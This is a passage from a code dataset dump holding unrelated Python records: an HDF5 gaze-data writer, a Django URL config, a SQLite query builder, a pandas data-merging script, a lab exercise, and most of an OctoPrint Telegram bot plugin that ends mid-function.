datasets:https://stackoverflow.com/questions/25655588/incremental-writes-to-hdf5-with-h5py?rq=1\n\t\t\timages= np.empty((len(fin['image']), 1,9,15))\n\t\t\timages[:,0,:,:] = fin['image'][:,13:22,22:37]*255\t\t\t\n\t\t\tposes = fin['pose']\n\t\t\tgazes = fin['gaze']\n\n\n\t\t\t#gaze_dset=hdf.create_dataset('gaze',data=gazes,dtype='f8')\n\t\t\tgaze_dset.resize(gaze_dset.shape[0]+len(gazes), axis=0)\n\t\t\tgaze_dset[-len(gazes):]=gazes \n\n\t\t\t#pose_dset=hdf.create_dataset('headpose',data=poses,dtype='f8')\n\t\t\tpose_dset.resize(pose_dset.shape[0]+len(poses), axis=0)\n\t\t\tpose_dset[-len(poses):]=poses \n\t\t\t\n\t\t\t#image_dset=hdf.create_dataset('data',data=images,dtype='uint8')\n\t\t\timages.astype('uint8')\n\t\t\timage_dset.resize(image_dset.shape[0]+len(images), axis=0)\n\t\t\timage_dset[-len(images):]=images#fin['image'] \n\n\t\t\tnearests=np.zeros((len(poses[:,0]),RADIUS+1))\n\t\t\tfor i in range(len(poses[:,0])):\n\t\t\t\t#print(i)\n\t\t\t\tgrp=find_nearest_group(poses[i,0],poses[i,1],groups_centers)\n\t\t\t\tnearests[i,:]=np.array(groups_nearests[grp])\n\t\t\t#nearests=np.array(nearests)\n\t\t\t#nearests_dset = hdf.create_dataset('nearestIDs',data=nearests,dtype='uint32')\n\t\t\tnearests_dset.resize(nearests_dset.shape[0]+len(images), axis=0)\n\t\t\tnearests_dset[-len(images):]=nearests#fin['image'] \n\t\n\n# with h5py.File('test_dataset.h5','w') as hdf:\n# hdf.create_dataset('gazes',data=test_gaze)\n# hdf.create_dataset('poses',data=test_pose)\n# hdf.create_dataset('label',data=test_img)\n\n\n\t\t#type=tensor\n\t\t#images = torch.unsqueeze(torch.from_numpy(images), 1)\n\t\t#poses = torch.from_numpy(poses)\n\t\t#gazes = torch.from_numpy(gazes)\n\t\t#print(type(gazes))\n\n","sub_path":"python/pytorch/forestDB_3fold.py","file_name":"forestDB_3fold.py","file_ext":"py","file_size_in_byte":8628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"504453516","text":"\"\"\"timepersistant URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.9/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url\nfrom django.contrib import admin\nfrom django.views.generic import RedirectView\n\nfrom main import views\n\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n url(r'^favicon\\.ico$', RedirectView.as_view(url='/static/favicon.ico')),\n url(r'^voyage/([0-9]+)', views.voyage_show),\n url(r'^voyage/last', views.voyage_show_last),\n url(r'^api/start_voyage', views.start_voyage, name=\"start_voyage\"),\n url(r'^api/stop_voyage', views.stop_voyage, name=\"stop_voyage\"),\n url(r'^api/voyage/([0-9]+)/add-time', views.modify_voyage('add')),\n url(r'^api/voyage/([0-9]+)/decrease-time', views.modify_voyage('decrease')),\n url(r'^api/voyage/([0-9]+)', views.voyage),\n url(r'^api/voyage', views.voyage),\n url(r'^$', views.main, name=\"main\"),\n]\n","sub_path":"timepersistant/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"507606681","text":"import sqlite3\n\n\ndef insert_img(tableName, fname=None, **kwargs):\n vals = sorted(kwargs.items())\n query = \"INSERT INTO \" + tableName +\"(\"\n for (key, val) in vals:\n query += str(key)+\", \"\n query = query[:-2] + \")\"\n query += \" VALUES (\"\n for (key, val) in vals:\n query += str(val) + \",\"\n query = query[:-1] + \")\"\n print(query)\n return query\n\n\ndef convert_to_binary_data(filename):\n # Convert digital data to binary format\n with open(filename, 'rb') as file:\n blob_data = file.read()\n return blob_data\n","sub_path":"dbUtils/createQuery.py","file_name":"createQuery.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"131336450","text":"import dataProcessing.raw_data_processing as raw\nimport pandas as pd\n\nroot_path = '../data/'\ncount_observatory = 17\n\n\ndef particulate_observatory_data_open(filename):\n pd_file = pd.read_csv(filename)\n pd_file = pd_file.dropna(thresh=2)\n return pd_file\n\n\ndef combine_data_oil_weather_open():\n file_path = root_path + 'combine_data.csv'\n pd_file = pd.read_csv(file_path)\n\n return pd_file\n\n\ndef combine_weather_oil_particulate():\n pd_combine_data = combine_data_oil_weather_open()\n\n file_path_root = root_path + '/raw/'\n file_path_tail = 'particulate_observatory.csv'\n\n pd_combine = []\n\n for i in range(1, count_observatory):\n file_path = file_path_root + str(i) + file_path_tail\n pd_particulate = particulate_observatory_data_open(file_path)\n # pd_particulate.to_csv('./data/asdf'+str(i)+'.csv', index=False)\n\n pd_combine.append(pd.merge(pd_particulate, pd_combine_data))\n\n return pd_combine\n\n\ndef combine_data_all():\n raw.raw_data_init()\n list_combine = combine_weather_oil_particulate()\n data = list_combine[0]\n\n for i in range(1, len(list_combine)):\n data = pd.concat([data, list_combine[i]])\n\n data = data.sort_values(['date'], ascending=[True])\n data.to_csv(root_path + 'data.csv', index=False)\n\n print(\"All Data combine >>>> OK :)\")\n\n\nif __name__ == '__main__':\n combine_data_all()\n","sub_path":"dataProcessing/combine_all_data.py","file_name":"combine_all_data.py","file_ext":"py","file_size_in_byte":1381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"421353492","text":"# Read the file\n\ntexts = []\n\nfile = open('data.txt', 'r')\n# file = open('data lab10_p4 Feedback.txt', 'r') # Feedback test code\n\nreader = file.readline()\nwhile reader != '':\n texts.append(int(reader[:-1]))\n reader = file.readline()\n\nfile.close()\n\n# Make the result\n\n#\n# Feedback : -6.25(25%) list out of range exception when the number of the input is only one\n# # Old code\n#\n# result = [(texts[0]*2 + texts[1])/3]\n#\n# for i in range(0, len(texts)-2):\n# result.append((texts[i] + texts[i+1] + texts[i+2])/3)\n#\n# result.append((texts[-2] + texts[-1]*2)/3)\n#\nresult = []\n\nx1 = [texts[0]] + texts + [texts[-1]]\n\nfor i in range(0, len(x1)-2):\n result.append( ( x1[i] + x1[i+1] + x1[i+2] ) / 3)\n#\n# Feedback completed\n#\n\n# Print\n\nprint(result)\n\n# Feedback : -6.25(25%) list out of range exception when the number of the input is only one\n","sub_path":"Lab solutions/Lab10/lab10_p4 Feedback.py","file_name":"lab10_p4 Feedback.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"426582062","text":"from __future__ import absolute_import\nfrom PIL import Image\nimport threading, requests, re, time, datetime, StringIO, json, random, logging\nimport octoprint.plugin, octoprint.util\nfrom flask.ext.babel import gettext\n\nclass TelegramListener(threading.Thread):\n\tdef __init__(self, main):\n\t\tthreading.Thread.__init__(self)\n\t\tself.update_offset = 0\n\t\tself.first_contact = True\n\t\tself.main = main\n\t\tself.do_stop = False\n\t\tself.username = \"UNKNOWN\"\n\t\tself._logger = main._logger.getChild(\"listener\")\n\t\n\tdef run(self):\n\t\tself._logger.debug(\"Listener is running.\")\n\t\ttry:\n\t\t\tself.username = self.main.test_token()\n\t\texcept Exception as ex:\n\t\t\tself.set_status(gettext(\"Got an exception while initially trying to connect to telegram: %(ex)s\", ex=ex))\n\t\t\treturn\n\t\tself.set_status(gettext(\"Connected as %(username)s.\", username=self.username), ok=True)\n\t\t\n\t\twhile not self.do_stop:\n\t\t\tself._logger.debug(\"listener: sending request with offset \" + str(self.update_offset) + \"...\")\n\t\t\treq = None\n\t\t\ttry:\n\t\t\t\ttimeout = '30'\n\t\t\t\tif self.update_offset == 0 and self.first_contact:\n\t\t\t\t\ttimeout = '0'\n\t\t\t\t\tself.update_offset = 1\n\t\t\t\treq = requests.get(self.main.bot_url + \"/getUpdates\", params={'offset':self.update_offset, 'timeout':timeout}, allow_redirects=False)\n\t\t\texcept Exception as ex:\n\t\t\t\tself.set_status(gettext(\"Got an exception while trying to connect to telegram API: %(exception)s. Waiting 2 minutes before trying again.\", exception=ex))\n\t\t\t\ttime.sleep(120)\n\t\t\t\tcontinue\n\t\t\tif req.status_code != 200:\n\t\t\t\tself.set_status(gettext(\"Telegram API responded with code %(status_code)s. Waiting 2 minutes before trying again.\", status_code=req.status_code))\n\t\t\t\ttime.sleep(120)\n\t\t\t\tcontinue\n\t\t\tif req.headers['content-type'] != 'application/json':\n\t\t\t\tself.set_status(gettext(\"Unexpected Content-Type. Expected: application/json. Was: %(type)s. Waiting 2 minutes before trying again.\", type=req.headers['content-type']))\n\t\t\t\ttime.sleep(120)\n\t\t\t\tcontinue\n\t\t\tjson = req.json()\n\t\t\tif not json['ok']:\n\t\t\t\tself.set_status(gettext(\"Response didn't include 'ok:true'. Waiting 2 minutes before trying again. Response was: %(response)s\", json))\n\t\t\t\ttime.sleep(120)\n\t\t\t\tcontinue\n\t\t\ttry:\n\t\t\t\tfor message in json['result']:\n\t\t\t\t\tself._logger.debug(str(message))\n\t\t\t\t\t# Get the update_id to only request newer Messages the next time\n\t\t\t\t\tif message['update_id'] >= self.update_offset:\n\t\t\t\t\t\tself.update_offset = message['update_id']+1\n\t\t\t\t\t\n\t\t\t\t\tif not message['message'] or not message['message']['chat']:\n\t\t\t\t\t\tself._logger.warn(\"Response is missing .message or .message.chat. Skipping it.\")\n\t\t\t\t\t\tcontinue\n\t\t\t\t\t\n\t\t\t\t\t### Parse new chats\n\t\t\t\t\tchat = message['message']['chat']\n\t\t\t\t\tchat_id = str(chat['id'])\n\t\t\t\t\tdata = {'accept_commands' : False, 'send_notifications' : False}\n\t\t\t\t\tif chat_id in self.main.chats:\n\t\t\t\t\t\tdata = self.main.chats[chat_id]\n\t\t\t\t\telse:\n\t\t\t\t\t\tself.main.chats[chat_id] = data\n\t\t\t\t\t\n\t\t\t\t\tif chat['type']=='group':\n\t\t\t\t\t\tdata['private'] = False\n\t\t\t\t\t\tdata['title'] = chat['title']\n\t\t\t\t\telif chat['type']=='private':\n\t\t\t\t\t\tdata['private'] = True\n\t\t\t\t\t\tdata['title'] = \"\"\n\t\t\t\t\t\tif \"first_name\" in chat:\n\t\t\t\t\t\t\tdata['title'] += chat['first_name'] + \" - \"\n\t\t\t\t\t\tif \"last_name\" in chat:\n\t\t\t\t\t\t\tdata['title'] += chat['last_name'] + \" - \"\n\t\t\t\t\t\tif \"username\" in chat:\n\t\t\t\t\t\t\tdata['title'] += \"@\" + chat['username']\n\t\t\t\t\tself._logger.debug(\"Chats: \" + repr(self.main.chats))\n\n\t\t\t\t\t#if message from group, user allowed?\n\t\t\t\t\tfrom_id = chat_id\n\t\t\t\t\tif not data['private'] and data['accept_commands']:\n\t\t\t\t\t\tfrom_id = str(message['message']['from']['id'])\n\t\t\t\t\t\t\n\t\t\t\t\tif self.first_contact:\n\t\t\t\t\t\tself._logger.debug(\"Ignoring message because first_contact is True.\")\n\t\t\t\t\t\tcontinue\n\t\t\t\t\t\n\t\t\t\t\tif \"text\" in message['message']:\n\t\t\t\t\t\t# We got a chat message.\n\t\t\t\t\t\tmsg_list = message['message']['text'].split('@')\n\t\t\t\t\t\tcommand = message['message']['text'].split('@')[0]\n\t\t\t\t\t\tparameter = None\n\t\t\t\t\t\tif \"reply_to_message\" in message['message'] and \"text\" in message['message']['reply_to_message']:\n\t\t\t\t\t\t\tcommand = message['message']['reply_to_message']['text']\n\t\t\t\t\t\t\tparameter = message['message']['text']\n\t\t\t\t\t\t\n\t\t\t\t\t\tself._logger.info(\"Got a command: '\" + command + \"' in chat \" + str(message['message']['chat']['id']))\n\t\t\t\t\t\tif from_id in self.main.chats and self.main.chats[from_id]['accept_commands'] and self.main.chats[from_id]['private']:\n\t\t\t\t\t\t\tif command==\"/abort\":\n\t\t\t\t\t\t\t\tself.main.track_action(\"command/abort\")\n\t\t\t\t\t\t\t\tif self.main._printer.is_printing():\n\t\t\t\t\t\t\t\t\tself.main.send_msg(gettext(\"Really abort the currently running print?\"), responses=[gettext(\"Yes, abort the print!\"), gettext(\"No, don't abort the print.\")],chatID=chat_id)\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\tself.main.send_msg(gettext(\"Currently I'm not printing, so there is nothing to stop.\"),chatID=chat_id)\n\t\t\t\t\t\t\telif command==gettext(\"Yes, abort the print!\"):\n\t\t\t\t\t\t\t\tself.main.send_msg(gettext(\"Aborting the print.\"),chatID=chat_id)\n\t\t\t\t\t\t\t\tself.main._printer.cancel_print()\n\t\t\t\t\t\t\telif command==gettext(\"No, don't abort the print.\"):\n\t\t\t\t\t\t\t\tself.main.send_msg(gettext(\"Okay, nevermind.\"),chatID=chat_id)\n\t\t\t\t\t\t\telif command==\"/shutup\":\n\t\t\t\t\t\t\t\tself.main.track_action(\"command/shutup\")\n\t\t\t\t\t\t\t\tself.main.shut_up = True\n\t\t\t\t\t\t\t\tself.main.send_msg(gettext(\"Okay, shutting up until the next print is finished. Use /imsorrydontshutup to let me talk again before that.\"),chatID=chat_id)\n\t\t\t\t\t\t\telif command==\"/imsorrydontshutup\":\n\t\t\t\t\t\t\t\tself.main.track_action(\"command/imsorrydontshutup\")\n\t\t\t\t\t\t\t\tself.main.shut_up = False\n\t\t\t\t\t\t\t\tself.main.send_msg(gettext(\"Yay, I can talk again.\"),chatID=chat_id)\n\t\t\t\t\t\t\telif command==\"/test\":\n\t\t\t\t\t\t\t\tself.main.track_action(\"command/test\")\n\t\t\t\t\t\t\t\tself.main.send_msg(gettext(\"Is this a test?\"), responses=[gettext(\"Yes, this is a test!\"), gettext(\"A test? Why would there be a test?\")],chatID=chat_id)\n\t\t\t\t\t\t\telif command==gettext(\"Yes, this is a test!\"):\n\t\t\t\t\t\t\t\tself.main.send_msg(gettext(\"I'm behaving, then.\"),chatID=chat_id)\n\t\t\t\t\t\t\telif command==gettext(\"A test? Why would there be a test?\"):\n\t\t\t\t\t\t\t\tself.main.send_msg(gettext(\"Phew.\"),chatID=chat_id)\n\t\t\t\t\t\t\telif command==\"/status\":\n\t\t\t\t\t\t\t\tself.main.track_action(\"command/status\")\n\t\t\t\t\t\t\t\tif not self.main._printer.is_operational():\n\t\t\t\t\t\t\t\t\tself.main.send_msg(gettext(\"Not connected to a printer.\"),chatID=chat_id)\n\t\t\t\t\t\t\t\telif self.main._printer.is_printing():\n\t\t\t\t\t\t\t\t\tstatus = self.main._printer.get_current_data()\n\t\t\t\t\t\t\t\t\tself.main.on_event(\"TelegramSendPrintingStatus\", {'z': (status['currentZ'] or 0.0)},chatID=chat_id)\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\tself.main.on_event(\"TelegramSendNotPrintingStatus\", {},chatID=chat_id)\n\t\t\t\t\t\t\telif command==\"/settings\":\n\t\t\t\t\t\t\t\tself.main.track_action(\"command/settings\")\n\t\t\t\t\t\t\t\tmsg = gettext(\"Current settings are:\\n\\nNotification height: %(height)fmm\\nNotification time: %(time)dmin\\n\\nWhich value do you want to change?\",\n\t\t\t\t\t\t\t\t\theight=self.main._settings.get_float([\"notification_height\"]),\n\t\t\t\t\t\t\t\t\ttime=self.main._settings.get_int([\"notification_time\"]))\n\t\t\t\t\t\t\t\tself.main.send_msg(msg, responses=[gettext(\"Change notification height\"), gettext(\"Change notification time\"), gettext(\"None\")],chatID=chat_id)\n\t\t\t\t\t\t\telif command==gettext(\"None\"):\n\t\t\t\t\t\t\t\tself.main.send_msg(gettext(\"OK.\"),chatID=chat_id)\n\t\t\t\t\t\t\telif command==gettext(\"Change notification height\"):\n\t\t\t\t\t\t\t\tself.main.send_msg(gettext(\"Please enter new notification height.\"), force_reply=True,chatID=chat_id)\n\t\t\t\t\t\t\telif command==gettext(\"Please enter new notification height.\") and parameter:\n\t\t\t\t\t\t\t\tself.main._settings.set_float(['notification_height'], parameter, force=True)\n\t\t\t\t\t\t\t\tself.main.send_msg(gettext(\"Notification height is now %(height)fmm.\", height=self.main._settings.get_float(['notification_height'])),chatID=chat_id)\n\t\t\t\t\t\t\telif command==gettext(\"Change notification time\"):\n\t\t\t\t\t\t\t\tself.main.send_msg(gettext(\"Please enter new notification time.\"), force_reply=True,chatID=chat_id)\n\t\t\t\t\t\t\telif command==gettext(\"Please enter new notification time.\") and parameter:\n\t\t\t\t\t\t\t\tself.main._settings.set_int(['notification_time'], parameter, force=True)\n\t\t\t\t\t\t\t\tself.main.send_msg(gettext(\"Notification time is now %(time)dmins.\", self.main._settings.get_int(['notification_time'])),chatID=chat_id)\n\t\t\t\t\t\t\telif command==\"/list\":\n\t\t\t\t\t\t\t\tself.main.track_action(\"command/list\")\n\t\t\t\t\t\t\t\tfiles = self.get_flat_file_tree()\n\t\t\t\t\t\t\t\tself.main.send_msg(\"File List:\\n\\n\" + \"\\n\".join(files) + \"\\n\\nYou can click the command beginning with /print after a file to start printing this file.\",chatID=chat_id)\n\t\t\t\t\t\t\telif command==\"/print\":\n\t\t\t\t\t\t\t\tself.main.send_msg(\"I don't know which file to print. Use /list to get a list of files and click the command beginning with /print after the correct file.\",chatID=chat_id)\n\t\t\t\t\t\t\telif command.startswith(\"/print_\"):\n\t\t\t\t\t\t\t\tself.main.track_action(\"command/print\")\n\t\t\t\t\t\t\t\thash = command[7:]\n\t\t\t\t\t\t\t\tself._logger.debug(\"Looking for hash: %s\", hash)\n\t\t\t\t\t\t\t\tdestination, file = self.find_file_by_hash(hash)\n\t\t\t\t\t\t\t\tself._logger.debug(\"Destination: %s\", destination)\n\t\t\t\t\t\t\t\tself._logger.debug(\"File: %s\", file)\n\t\t\t\t\t\t\t\tif file is None:\n\t\t\t\t\t\t\t\t\tself.main.send_msg(\"I'm sorry, but I couldn't find the file you wanted me to print. Perhaps you want to have a look at /list again?\",chatID=chat_id)\n\t\t\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\t\t\tself._logger.debug(\"data: %s\", self.main._printer.get_current_data())\n\t\t\t\t\t\t\t\tself._logger.debug(\"state: %s\", self.main._printer.get_current_job())\n\t\t\t\t\t\t\t\tif destination==octoprint.filemanager.FileDestinations.SDCARD:\n\t\t\t\t\t\t\t\t\tself.main._printer.select_file(file, True, printAfterSelect=False)\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\tfile = self.main._file_manager.path_on_disk(octoprint.filemanager.FileDestinations.LOCAL, file)\n\t\t\t\t\t\t\t\t\tself._logger.debug(\"Using full path: %s\", file)\n\t\t\t\t\t\t\t\t\tself.main._printer.select_file(file, False, printAfterSelect=False)\n\t\t\t\t\t\t\t\tdata = self.main._printer.get_current_data()\n\t\t\t\t\t\t\t\tif data['job']['file']['name'] is not None:\n\t\t\t\t\t\t\t\t\tself.main.send_msg(gettext(\"Okay. The file %(file)s is loaded. Do you want me to start printing it now?\", file=data['job']['file']['name']), responses=[gettext(\"Yes, start printing, please.\"), gettext(\"Nope.\")],chatID=chat_id)\n\t\t\t\t\t\t\telif command==gettext(\"Yes, start printing, please.\"):\n\t\t\t\t\t\t\t\tdata = self.main._printer.get_current_data()\n\t\t\t\t\t\t\t\tif data['job']['file']['name'] is None:\n\t\t\t\t\t\t\t\t\tself.main.send_msg(gettext(\"Uh oh... No file is selected for printing. Did you select one using /list?\"),chatID=chat_id)\n\t\t\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\t\t\tif not self.main._printer.is_operational():\n\t\t\t\t\t\t\t\t\tself.main.send_msg(gettext(\"Can't start printing: I'm not connected to a printer.\"),chatID=chat_id)\n\t\t\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\t\t\tif self.main._printer.is_printing():\n\t\t\t\t\t\t\t\t\tself.main.send_msg(\"A print job is already running. You can't print two thing at the same time. Maybe you want to use /abort?\",chatID=chat_id)\n\t\t\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\t\t\tself.main._printer.start_print()\n\t\t\t\t\t\t\t\tself.main.send_msg(gettext(\"Started the print job.\"),chatID=chat_id)\n\t\t\t\t\t\t\telif command==gettext(\"Nope.\"):\n\t\t\t\t\t\t\t\tself.main.send_msg(\"It's okay. We all make mistakes sometimes.\",chatID=chat_id)\n\t\t\t\t\t\t\telif command==\"/upload\":\n\t\t\t\t\t\t\t\tself.main.track_action(\"command/upload_command_that_tells_the_user_to_just_send_a_file\")\n\t\t\t\t\t\t\t\tself.main.send_msg(\"To upload a gcode file, just send it to me.\",chatID=chat_id)\n\t\t\t\t\t\t\telif command==\"/light\":\n\t\t\t\t\t\t\t\tself.main._printer.commands(\"M42 P47 S255\")\n\t\t\t\t\t\t\t\tself.main.send_msg(\"I put the lights on.\",chatID=chat_id)\n\t\t\t\t\t\t\telif command==\"/darkness\":\n\t\t\t\t\t\t\t\tself.main._printer.commands(\"M42 P47 S0\")\n\t\t\t\t\t\t\t\tself.main.send_msg(\"Lights are off now.\",chatID=chat_id)\n\t\t\t\t\t\t\telif command==\"/help\":\n\t\t\t\t\t\t\t\tself.main.track_action(\"command/help\")\n\t\t\t\t\t\t\t\tself.main.send_msg(gettext(\"You can use following commands:\\n\"\n\t\t\t\t\t\t\t\t \"/abort - Aborts the currently running print. A confirmation is required.\\n\"\n\t\t\t\t\t\t\t\t \"/shutup - Disables automatic notifications till the next print ends.\\n\"\n\t\t\t\t\t\t\t\t \"/imsorrydontshutup - The opposite of /shutup - Makes the bot talk again.\\n\"\n\t\t\t\t\t\t\t\t \"/status - Sends the current status including a current photo.\\n\"\n\t\t\t\t\t\t\t\t \"/settings - Displays the current notification settings and allows you to change them.\"),chatID=chat_id)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tself._logger.warn(\"Previous command was from an unknown user.\")\n\t\t\t\t\t\t\tself.main.send_msg(\"You are not allowed to do this!\",chatID=chat_id)\n\t\t\t\t\telif \"document\" in message['message']:\n\t\t\t\t\t\tself.main.track_action(\"command/upload\")\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tfile_name = msg['document']['file_name']\n\t\t\t\t\t\t\tif not (file_name.lower().endswith('.gcode') or file_name.lower().endswith('.gco') or file_name.lower().endswith('.g')):\n\t\t\t\t\t\t\t\tself.main.send_msg(\"Sorry, I only accept files with .gcode, .gco or .g extension.\")\n\t\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\t\t# download the file\n\t\t\t\t\t\t\tdata = self.main.get_file(msg['document']['file_id'])\n\t\t\t\t\t\t\t# self.main._file_manager.add_folder(octoprint.filemanager.FileDestinations.LOCAL, \"telegram_uploads\", ignore_existing=True)\n\t\t\t\t\t\t\tstream = octoprint.filemanager.util.StreamWrapper(file_name, io.BytesIO(data))\n\t\t\t\t\t\t\t# self.main._file_manager.add_file(octoprint.filemanager.FileDestinations.LOCAL, \"telegram_uploads/{}\".format(file_name), stream, allow_overwrite=True)\n\t\t\t\t\t\t\ttarget_filename = \"telegram_\" + file_name\n\t\t\t\t\t\t\tself.main._file_manager.add_file(octoprint.filemanager.FileDestinations.LOCAL, target_filename, stream, allow_overwrite=True)\n\t\t\t\t\t\t\tself.main.send_msg(\"I've successfully saved the file you sent me as {}.\".format(target_filename))\n\t\t\t\t\t\texcept Exception as ex:\n\t\t\t\t\t\t\tself.main.send_msg(\"Something went wrong during processing of your file. Sorry. More details are in octoprint.log.\")\n\t\t\t\t\t\t\tself._logger.debug(\"Exception occured during processing of a file: \" + traceback.format_exc())\n\t\t\t\t\telse:\n\t\t\t\t\t\tself._logger.warn(\"Got an unknown message. Doing nothing. Data: \" + str(msg))\n\t\t\texcept Exception as ex:\n\t\t\t\tself._logger.error(\"Exception caught! \" + str(ex))\n\t\t\t\n\t\t\tself.set_status(gettext(\"Connected as %(username)s.\", username=self.username), ok=True)\n\t\t\t\t\n\t\t\tif self.first_contact:\n\t\t\t\tself.first_contact = False\n\t\t\t\tif self.main._settings.get_boolean([\"message_at_startup\"]):\n\t\t\t\t\tself.main.send_msg(gettext(\"Hello. I'm online and ready to receive your commands.\"))\n\t\tself._logger.debug(\"Listener exits NOW.\")\n\t\n\tdef stop(self):\n\t\tself.do_stop = True\n\t\n\tdef set_status(self, status, ok=False):\n\t\tif status != self.main.connection_state_str:\n\t\t\tif self.do_stop:\n\t\t\t\tself._logger.debug(\"Would set status but do_stop is True: %s\", status)\n\t\t\t\treturn\n\t\t\tif ok:\n\t\t\t\tself._logger.debug(\"Setting status: %s\", status)\n\t\t\telse:\n\t\t\t\tself._logger.error(\"Setting status: %s\", status)\n\t\tself.connection_ok = ok\n\t\tself.main.connection_state_str = status\n\n\tdef get_flat_file_tree(self):\n\t\ttree = self.main._file_manager.list_files(recursive=True)\n\t\tarray = []\n\t\tfor key in tree:\n\t\t\tarray.append(key + \":\")\n\t\t\tarray.extend(sorted(self.flatten_file_tree_recursively(tree[key])))\n\t\treturn array\n\t\t\t\n\tdef flatten_file_tree_recursively(self, tree, base=\"\"):\n\t\tarray = []\n\t\tfor key in tree:\n\t\t\tif tree[key]['type']==\"folder\":\n\t\t\t\tarray.extend(self.flatten_file_tree_recursively(tree[key]['children'], base=base+key+\"/\"))\n\t\t\telif tree[key]['type']==\"machinecode\":\n\t\t\t\tarray.append(base+key + \" - /print_\" + tree[key]['hash'][0:8])\n\t\t\telse:\n\t\t\t\tarray.append(base+key)\n\t\treturn array\n\t\n\tdef find_file_by_hash(self, hash):\n\t\ttree = self.main._file_manager.list_files(recursive=True)\n\t\tfor key in tree:\n\t\t\tresult = self.find_file_by_hash_recursively(tree[key], hash)\n\t\t\tif result is not None:\n\t\t\t\treturn key, result\n\t\treturn None, None\n\t\n\tdef find_file_by_hash_recursively(self, tree, hash, base=\"\"):\n\t\tfor key in tree:\n\t\t\tif tree[key]['type']==\"folder\":\n\t\t\t\tresult = self.find_file_by_hash_recursively(tree[key]['children'], hash, base=base+key+\"/\")\n\t\t\t\tif result is not None:\n\t\t\t\t\treturn result\n\t\t\t\tcontinue\n\t\t\tif tree[key]['hash'].startswith(hash):\n\t\t\t\treturn base+key\n\t\treturn None\n\nclass TelegramPluginLoggingFilter(logging.Filter):\n\tdef filter(self, record):\n\t\tfor match in re.findall(\"[0-9]+:[a-zA-Z0-9_\\-]+\", record.msg):\n\t\t\tnew = re.sub(\"[0-9]\", \"1\", re.sub(\"[a-z]\", \"a\", re.sub(\"[A-Z]\", \"A\", match)))\n\t\t\trecord.msg = record.msg.replace(match, new)\n\t\treturn True\n\nclass TelegramPlugin(octoprint.plugin.EventHandlerPlugin,\n octoprint.plugin.SettingsPlugin,\n octoprint.plugin.StartupPlugin,\n octoprint.plugin.ShutdownPlugin,\n octoprint.plugin.TemplatePlugin,\n octoprint.plugin.SimpleApiPlugin,\n octoprint.plugin.AssetPlugin):\n\tdef __init__(self):\n\t\tself.thread = None\n\t\tself.last_z = 0.0\n\t\tself.last_notification_time = 0\n\t\tself.bot_url = None\n\t\tself.first_contact = True\n\t\tself.chats = {}\n\t\tself.shut_up = False\n\t\tself.connection_state_str = gettext(\"Disconnected.\")\n\t\tself.connection_ok = False\n\t\trequests.packages.urllib3.disable_warnings()\n\n\tdef start_listening(self):\n\t\tif self._settings.get(['token']) != \"\" and self.thread is None:\n\t\t\tself._logger.debug(\"Starting listener.\")\n\t\t\tself.bot_url = \"https://api.telegram.org/bot\" + self._settings.get(['token'])\n\t\t\tself.bot_file_url = \"https://api.telegram.org/file/bot\" + self._settings.get(['token'])\n\t\t\tself.thread = TelegramListener(self)\n\t\t\tself.thread.daemon = True\n\t\t\tself.thread.start()\n\t\n\tdef stop_listening(self):\n\t\tif self.thread is not None:\n\t\t\tself._logger.debug(\"Stopping listener.\")\n\t\t\tself.thread.stop()\n\t\t\tself.thread = None\n\t\n\tdef on_after_startup(self):\n\t\tself.set_log_level()\n\t\tself._logger.addFilter(TelegramPluginLoggingFilter())\n\t\tself.start_listening()\n\t\tself.track_action(\"started\")\n\t\tself.chats = self._settings.get([\"chats\"])\n\t\n\tdef on_shutdown(self):\n\t\tif self._settings.get_boolean([\"message_at_shutdown\"]):\n\t\t\tself.send_msg(gettext(\"Shutting down. Goodbye.\"))\n\t\n\tdef set_log_level(self):\n\t\tself._logger.setLevel(logging.DEBUG if self._settings.get_boolean([\"debug\"]) else logging.NOTSET)\n\t\n\tdef get_settings_preprocessors(self):\n\t\treturn dict(), dict(\n\t\t\tnotification_height=lambda x: float(x),\n\t\t\tnotification_time=lambda x: int(x)\n\t\t)\n\t\n\tdef on_settings_save(self, data):\n\t\tdata['chats'] = self.chats\n\t\tself._logger.debug(\"Saving data: \" + str(data))\n\t\tdata['token'] = data['token'].strip()\n\t\tif not re.match(\"^[0-9]+:[a-zA-Z0-9_\\-]+$\", data['token']):\n\t\t\tself._logger.error(\"Not saving token because it doesn't seem to have the right format.\")\n\t\t\tself.connection_state_str = gettext(\"The previously entered token doesn't seem to have the correct format. It should look like this: 12345678:AbCdEfGhIjKlMnOpZhGtDsrgkjkZTCHJKkzvjhb\")\n\t\t\tdata['token'] = \"\"\n\t\told_token = self._settings.get([\"token\"])\n\t\tif not data['tracking_activated']:\n\t\t\tdata['tracking_token'] = None\n\t\toctoprint.plugin.SettingsPlugin.on_settings_save(self, data)\n\t\tself.set_log_level()\n\t\tif 